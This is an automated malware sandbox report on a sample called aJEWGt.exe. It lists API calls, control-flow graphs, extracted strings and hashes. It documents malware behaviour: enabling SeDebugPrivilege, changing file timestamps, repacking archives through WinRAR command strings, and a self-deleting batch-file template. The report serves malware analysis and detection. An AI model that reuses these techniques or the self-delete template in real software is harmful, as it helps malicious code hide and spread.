                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: ExitHandleModuleProcessQueryVirtual
                            • String ID:
                            • API String ID: 3946701194-0
                            • Opcode ID: 181df8f21ab1c05aaaf385865b9e21d8bfeee2bc93cd4821d1226c6f32fe16f5
                            • Instruction ID: 86239b4bcaa2d20425405ec2dcaffdbe64c82edd67673fef06f44e91526fb627
                            • Opcode Fuzzy Hash: 181df8f21ab1c05aaaf385865b9e21d8bfeee2bc93cd4821d1226c6f32fe16f5
                            • Instruction Fuzzy Hash: 89113CB1E412A4EFCB21DFE6ACC5A7D77BCEB8C751B10402AF403DB150D27489429B61

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 397 ae1915-ae1922 398 ae1928-ae192c 397->398 399 ae1924-ae1926 397->399 401 ae192e-ae194d memset GetFileTime 398->401 402 ae194f-ae1952 398->402 400 ae196e-ae1970 399->400 403 ae1966-ae1968 401->403 402->400 404 ae1954-ae1960 SetFileTime 402->404 405 ae196c 403->405 406 ae196a 403->406 404->403 405->400 406->405
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: FileTimememset
                            • String ID:
                            • API String ID: 176422537-0
                            • Opcode ID: af4146d0dcc7b22bdfc43876e37825728594ed9390a3afd9e8106ccbebbac7ed
                            • Instruction ID: 3b669ee32fc7d7cbc85f43d5e9523e05cf935ca3fea47c8b6f21620f1b0bbe59
                            • Opcode Fuzzy Hash: af4146d0dcc7b22bdfc43876e37825728594ed9390a3afd9e8106ccbebbac7ed
                            • Instruction Fuzzy Hash: 65F06232200259ABDB20DF67DC44BEB77ACAB50361F50853AF526D6091E770E645CBB0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 407 ae6158-ae6189 VirtualFree 408 ae618c-ae6192 407->408 409 ae6198-ae61b0 VirtualFree 408->409 410 ae60c7-ae60cf 408->410 411 ae61ba-ae61c8 409->411 412 ae61b2-ae61b4 409->412 410->408 413 ae60d5-ae60f8 VirtualAlloc 410->413 414 ae61ca-ae61d7 411->414 415 ae6243-ae6251 411->415 412->411 433 ae60fe-ae6106 413->433 434 ae60fa-ae60fc call ae66c8 413->434 419 ae61dd-ae61e0 414->419 417 ae6264-ae626f 415->417 418 ae6253 415->418 422 ae6271-ae6276 417->422 421 ae6255-ae6258 418->421 419->415 423 ae61e2-ae61f2 419->423 421->417 425 ae625a-ae6262 421->425 426 ae627c-ae6289 422->426 427 ae6389-ae63b1 VirtualProtect 422->427 428 ae61f5-ae61fe 423->428 425->421 447 ae628b 426->447 448 ae6292-ae6298 426->448 432 ae63b7-ae63ba 427->432 430 ae620c-ae6219 428->430 431 ae6200-ae6203 428->431 441 ae6238-ae623f 430->441 439 ae621b-ae6228 431->439 440 ae6205-ae6208 431->440 442 ae63fc-ae6416 VirtualProtect 432->442 443 ae63bc-ae63c2 432->443 436 ae6108-ae611d 433->436 437 ae6155-ae6189 VirtualFree 433->437 434->433 444 ae611f-ae6121 436->444 437->408 439->441 449 ae622a-ae6236 440->449 450 ae620a 440->450 441->428 453 ae6241 441->453 445 ae6418-ae641d 442->445 446 ae6420-ae6425 442->446 443->443 451 ae63c4 443->451 454 ae6123 444->454 455 ae6151-ae6154 444->455 447->448 456 ae62a2-ae62ac 448->456 449->441 450->441 451->442 457 ae63c6-ae63cf 451->457 453->419 454->455 458 ae6125-ae6128 454->458 455->437 459 ae62ae 456->459 460 ae62b1-ae62c8 456->460 461 ae63d4-ae63d8 457->461 462 ae63d1 457->462 465 ae612a-ae612e 458->465 466 ae6134-ae613b 458->466 459->460 467 ae62ce-ae62d4 460->467 468 ae6373-ae6384 460->468 463 ae63dd-ae63e1 461->463 464 ae63da 461->464 462->461 469 ae63e7-ae63fa VirtualProtect 463->469 470 ae63e3 463->470 464->463 465->466 475 ae6130-ae6132 465->475 466->475 476 ae613d-ae614f 466->476 473 ae62da-ae62f1 467->473 474 ae62d6-ae62d9 467->474 468->422 469->432 469->442 470->469 478 ae6365-ae636e 473->478 479 ae62f3-ae62f9 473->479 474->473 475->444 476->444 478->456 480 ae62fb-ae630f 479->480 481 ae6314-ae6326 479->481 482 ae6426-ae64a9 480->482 483 ae634c-ae6360 481->483 484 ae6328-ae634a 481->484 492 ae64ab-ae64c0 482->492 493 ae6519-ae651c 482->493 483->482 484->478 499 ae6535-ae6537 492->499 500 ae64c2 492->500 494 ae651d-ae651e 493->494 495 ae6583-ae6587 493->495 498 ae6522-ae6533 494->498 497 ae6588-ae658b 495->497 501 ae658d-ae658f 497->501 502 ae65a1-ae65a3 497->502 498->499 503 ae659a 499->503 504 ae6539 499->504 505 ae64f8 500->505 506 ae64c5-ae64cd 500->506 507 ae6591-ae6593 501->507 510 ae659b-ae659d 503->510 508 ae653b-ae6541 504->508 509 ae65b4 504->509 513 ae656c-ae656f 505->513 514 ae64fa-ae64fe 505->514 511 ae64cf-ae64d4 506->511 512 ae6542-ae6545 506->512 507->510 517 ae6595 507->517 508->512 522 ae65be-ae6608 509->522 510->507 518 ae659f 510->518 519 ae64d6-ae64d9 511->519 520 ae6517-ae6518 511->520 521 ae654d-ae6550 512->521 515 ae6572 513->515 514->515 516 ae6500 514->516 523 ae6573-ae6576 515->523 516->498 524 ae6502 516->524 517->503 518->497 519->521 525 ae64db-ae64f5 519->525 520->493 521->522 526 ae6552-ae6556 521->526 527 ae6578-ae657f 523->527 524->523 528 ae6504-ae6513 524->528 525->505 526->527 529 ae6558-ae6569 526->529 527->495 528->499 531 ae6515 528->531 529->513 531->520
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00AE60DF
                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00AE6189
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00AE61A5
                            Memory Dump Source
                            • Source File: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: Virtual$Free$Alloc
                            • String ID:
                            • API String ID: 1852963964-0
                            • Opcode ID: 0a12efd314d95662c7c4f3e6d9d65097dcf411b979c9647fc21d0dc35ccd9b74
                            • Instruction ID: 660c98f812e7eda9607e9deebf1e9c44b9fffcc06c186a798cef8dbf4dafd4a2
                            • Opcode Fuzzy Hash: 0a12efd314d95662c7c4f3e6d9d65097dcf411b979c9647fc21d0dc35ccd9b74
                            • Instruction Fuzzy Hash: 31119D32A00689CFCF328F59CC953DD37A1FF21341F684919DE8A5B291DA712D40CB94
                            APIs
                            • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\aJEWGt.exe,?,?,?,?,?,?,00AE13EF), ref: 00AE11AB
                            • OpenProcessToken.ADVAPI32(00000000,00000028,00AE13EF,?,?,?,?,?,?,00AE13EF), ref: 00AE11BB
                            • AdjustTokenPrivileges.ADVAPI32(00AE13EF,00000000,?,00000010,00000000,00000000), ref: 00AE11EB
                            • CloseHandle.KERNEL32(00AE13EF), ref: 00AE11FA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00AE13EF), ref: 00AE1203
                            Strings
                            • C:\Users\user\AppData\Local\Temp\aJEWGt.exe, xrefs: 00AE11A5
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                            • String ID: C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                            • API String ID: 75692138-1418763937
                            • Opcode ID: bde308b0d99d67afc4191389d2b4cba85fea5f998209a833a085a05fb0d89ebd
                            • Instruction ID: 9cad48e8aa76240045cb20aea485349551f7b28194bb2fd2b8f066cbffd43ec2
                            • Opcode Fuzzy Hash: bde308b0d99d67afc4191389d2b4cba85fea5f998209a833a085a05fb0d89ebd
                            • Instruction Fuzzy Hash: AA0124B2900248FFDF10EFE4DD89AAEBBB9FB08304F104469E606A6250D7709F459F50
                            APIs
                            • strstr.MSVCRT ref: 00AE23CC
                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE2464
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00AE2472
                            • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00AE24A8
                            • memset.MSVCRT ref: 00AE24B9
                            • strrchr.MSVCRT ref: 00AE24C9
                            • wsprintfA.USER32 ref: 00AE24DE
                            • strrchr.MSVCRT ref: 00AE24ED
                            • memset.MSVCRT ref: 00AE24F2
                            • memset.MSVCRT ref: 00AE2505
                            • wsprintfA.USER32 ref: 00AE2524
                            • Sleep.KERNEL32(000007D0), ref: 00AE2535
                            • Sleep.KERNEL32(000007D0), ref: 00AE255D
                            • memset.MSVCRT ref: 00AE256E
                            • wsprintfA.USER32 ref: 00AE2585
                            • memset.MSVCRT ref: 00AE25A6
                            • wsprintfA.USER32 ref: 00AE25CA
                            • Sleep.KERNEL32(000007D0), ref: 00AE25D0
                            • Sleep.KERNEL32(000007D0,?,?), ref: 00AE25E5
                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE25FC
                            • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00AE2611
                            • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00AE2642
                            • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00AE265B
                            • SetEndOfFile.KERNEL32 ref: 00AE266D
                            • CloseHandle.KERNEL32(00000000), ref: 00AE2676
                            • RemoveDirectoryA.KERNEL32(?), ref: 00AE2681
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                            • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                            • API String ID: 2203340711-2750826870
                            • Opcode ID: 6880a7e863da7c18298e83242900259c6d3eba6fc570be3d5ce9fef2f0adb11d
                            • Instruction ID: a230f92bcc40d0dc82da44ce9fd80a35ce863a0ec084d34707058f349f054369
                            • Opcode Fuzzy Hash: 6880a7e863da7c18298e83242900259c6d3eba6fc570be3d5ce9fef2f0adb11d
                            • Instruction Fuzzy Hash: 8581A1B2504384BBDB10DFA2DC89FAB77EDFB88704F00091AF684D7190D7749A498B66
                            APIs
                            • memset.MSVCRT ref: 00AE2766
                            • memset.MSVCRT ref: 00AE2774
                            • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00AE2787
                            • wsprintfA.USER32 ref: 00AE27AB
                              • Part of subcall function 00AE185B: GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
                              • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1878
                              • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1880
                              • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1890
                              • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1894
                            • wsprintfA.USER32 ref: 00AE27C6
                            • CopyFileA.KERNEL32(?,00AE4C80,00000000), ref: 00AE27D4
                            • wsprintfA.USER32 ref: 00AE27F4
                              • Part of subcall function 00AE1973: PathFileExistsA.SHLWAPI(00AE4E5C,00000000,C:\Users\user\AppData\Local\Temp\aJEWGt.exe), ref: 00AE1992
                              • Part of subcall function 00AE1973: CreateFileA.KERNEL32(00AE4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AE19BA
                              • Part of subcall function 00AE1973: Sleep.KERNEL32(00000064), ref: 00AE19C6
                              • Part of subcall function 00AE1973: wsprintfA.USER32 ref: 00AE19EC
                              • Part of subcall function 00AE1973: CopyFileA.KERNEL32(00AE4E5C,?,00000000), ref: 00AE1A00
                              • Part of subcall function 00AE1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE1A1E
                              • Part of subcall function 00AE1973: GetFileSize.KERNEL32(00AE4E5C,00000000), ref: 00AE1A2C
                              • Part of subcall function 00AE1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AE1A46
                              • Part of subcall function 00AE1973: ReadFile.KERNEL32(00AE4E5C,00AE4E60,00000000,?,00000000), ref: 00AE1A65
                            • DeleteFileA.KERNEL32(?,?,00AE4E54,00AE4E58), ref: 00AE281A
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00AE4E54,00AE4E58), ref: 00AE2832
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                            • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                            • API String ID: 692489704-613076915
                            • Opcode ID: b7e72d4efab014c61f526f188b795d815b67572f03a3644eab07b205e91aa6f5
                            • Instruction ID: 378f244a465c10ae2645185910d9e3c418814047f3a918a4f735558ca65c7e78
                            • Opcode Fuzzy Hash: b7e72d4efab014c61f526f188b795d815b67572f03a3644eab07b205e91aa6f5
                            • Instruction Fuzzy Hash: A621FCB7D402987BEB10E7A69D89FEB776CEB14754F0009A1B645E3042E6B49F448BA0
                            APIs
                              • Part of subcall function 00AE185B: GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
                              • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1878
                              • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1880
                              • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1890
                              • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1894
                            • wsprintfA.USER32 ref: 00AE15AA
                            • wsprintfA.USER32 ref: 00AE15C6
                            • lstrlen.KERNEL32(?), ref: 00AE15D2
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00AE15EE
                            • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00AE1609
                            • CloseHandle.KERNEL32(00000000), ref: 00AE1612
                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00AE162D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                            • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\aJEWGt.exe$open
                            • API String ID: 617340118-3975861192
                            • Opcode ID: acc9b14e7d6fffe9dcde48ca9486975253c47c753164d91ea8aedb33f78fc3e4
                            • Instruction ID: 58a6aa67b9bc404a7858cc5f0b692379ab5408d97af4875a4788d887ecabfe87
                            • Opcode Fuzzy Hash: acc9b14e7d6fffe9dcde48ca9486975253c47c753164d91ea8aedb33f78fc3e4
                            • Instruction Fuzzy Hash: 7E115173A011A8BADF20D7E59C8DDEB7B6CEF59760F000591F549E3040DA709B858BB0
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00AE1400), ref: 00AE1226
                            • GetProcAddress.KERNEL32(00000000), ref: 00AE122D
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00AE1400), ref: 00AE123F
                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00AE1400), ref: 00AE1250
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\aJEWGt.exe,?,?,?,?,00AE1400), ref: 00AE129E
                            • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\aJEWGt.exe,?,?,?,?,00AE1400), ref: 00AE12B0
                            • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\aJEWGt.exe,?,?,?,?,00AE1400), ref: 00AE12F5
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00AE1400), ref: 00AE130A
                            Strings
                            • C:\Users\user\AppData\Local\Temp\aJEWGt.exe, xrefs: 00AE1262
                            • ntdll.dll, xrefs: 00AE1219
                            • ZwQuerySystemInformation, xrefs: 00AE1212
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                            • String ID: C:\Users\user\AppData\Local\Temp\aJEWGt.exe$ZwQuerySystemInformation$ntdll.dll
                            • API String ID: 1500695312-1578725469
                            • Opcode ID: bc43459f18e7fc3a0a14731275bcf7bfd29c0ec9140414bbf227d350b55a71b6
                            • Instruction ID: 8ff5b6c05890d3dd671d54e2b43a99c9f7a18b07b607b3edaa5e440c22c2868a
                            • Opcode Fuzzy Hash: bc43459f18e7fc3a0a14731275bcf7bfd29c0ec9140414bbf227d350b55a71b6
                            • Instruction Fuzzy Hash: 7A21D7726053A1ABDB20DB96DC48FAFBAA8FB45B11F400928F645EB240C770DA45C7A5
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7591E800,?,?,00AE29DB,?,00000001), ref: 00AE26A7
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,7591E800,?,?,00AE29DB,?,00000001), ref: 00AE26B5
                            • lstrlen.KERNEL32(?), ref: 00AE26C4
                            • ??2@YAPAXI@Z.MSVCRT ref: 00AE26CE
                            • lstrcpy.KERNEL32(00000004,?), ref: 00AE26E3
                            • lstrcpy.KERNEL32(?,00000004), ref: 00AE271F
                            • ??3@YAXPAX@Z.MSVCRT ref: 00AE272D
                            • SetEvent.KERNEL32 ref: 00AE273C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                            • String ID:
                            • API String ID: 41106472-0
                            • Opcode ID: c3d8361641fc17974fb0747937f855ae1fb0194e1bec0ca255045f10b60a934e
                            • Instruction ID: 1551ca18c09a50e8a0c3236c9b9489ad187a986dd74babc1e021340fa70632ee
                            • Opcode Fuzzy Hash: c3d8361641fc17974fb0747937f855ae1fb0194e1bec0ca255045f10b60a934e
                            • Instruction Fuzzy Hash: E1116D76500290EFCB32DF96EDC89AA7BBEFB887217144115F8589F120D7709D86DB90
                            APIs
                            Strings
                            • AGBRqHwtNIIBOhUCwmTQKkxTrzyaPXyuhJkhIuDbCoiFjLdZeAgECrWlFleBfDnpNcVuYsXLYiczsxNaeXUdgFEqEHvmbgojPjsqRlGZGwtvOKMRMfWmzZYVTonSaSpfMSDWkOHiyLQpcxbrQnPdJVUKvtJA, xrefs: 00AE1B8A, 00AE1B9C, 00AE1C15, 00AE1C49
                            • .exe, xrefs: 00AE1C57
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: lstrcatmemcpymemsetrandsrand
                            • String ID: .exe$AGBRqHwtNIIBOhUCwmTQKkxTrzyaPXyuhJkhIuDbCoiFjLdZeAgECrWlFleBfDnpNcVuYsXLYiczsxNaeXUdgFEqEHvmbgojPjsqRlGZGwtvOKMRMfWmzZYVTonSaSpfMSDWkOHiyLQpcxbrQnPdJVUKvtJA
                            • API String ID: 122620767-3267077789
                            • Opcode ID: 2bc7f6f78d8c2d9acc94cb8ebc27dc1a6125b682403b65fda97e099d0ca12e41
                            • Instruction ID: 96cdaf1dbfcab8116c52cf453694b566ef93f54d9844b217511f95a7f8fb787e
                            • Opcode Fuzzy Hash: 2bc7f6f78d8c2d9acc94cb8ebc27dc1a6125b682403b65fda97e099d0ca12e41
                            • Instruction Fuzzy Hash: 4C216833E442E06EE226933BACC0BAE3B489FEB721F254099F5954F192D17409938361
                            APIs
                            • memset.MSVCRT ref: 00AE18B1
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75920F00,75A78400), ref: 00AE18D3
                            • CloseHandle.KERNEL32(00AE2549), ref: 00AE18E9
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AE18F0
                            • GetExitCodeProcess.KERNEL32(?,00AE2549), ref: 00AE1901
                            • CloseHandle.KERNEL32(?), ref: 00AE190A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                            • String ID:
                            • API String ID: 876959470-0
                            • Opcode ID: 6ad2a1549c3b8b9f5d229a215bed0ec1bba44749786ab14c4ad96fb28e73b46b
                            • Instruction ID: 1d763bd0fa1db7d18c358276fa58755e5df3048a4253493703887930a59a81a0
                            • Opcode Fuzzy Hash: 6ad2a1549c3b8b9f5d229a215bed0ec1bba44749786ab14c4ad96fb28e73b46b
                            • Instruction Fuzzy Hash: 78015A729011A8BBCF21ABD6DC48DEFBF3DEB85720F104021FA15A61A0D6714A19CBA0
                            APIs
                            • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\aJEWGt.exe), ref: 00AE13BC
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00AE13DA
                            • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00AE1448
                              • Part of subcall function 00AE119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\aJEWGt.exe,?,?,?,?,?,?,00AE13EF), ref: 00AE11AB
                              • Part of subcall function 00AE119F: OpenProcessToken.ADVAPI32(00000000,00000028,00AE13EF,?,?,?,?,?,?,00AE13EF), ref: 00AE11BB
                              • Part of subcall function 00AE119F: AdjustTokenPrivileges.ADVAPI32(00AE13EF,00000000,?,00000010,00000000,00000000), ref: 00AE11EB
                              • Part of subcall function 00AE119F: CloseHandle.KERNEL32(00AE13EF), ref: 00AE11FA
                              • Part of subcall function 00AE119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00AE13EF), ref: 00AE1203
                            Strings
                            • SeDebugPrivilege, xrefs: 00AE13D3
                            • C:\Users\user\AppData\Local\Temp\aJEWGt.exe, xrefs: 00AE13A8
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
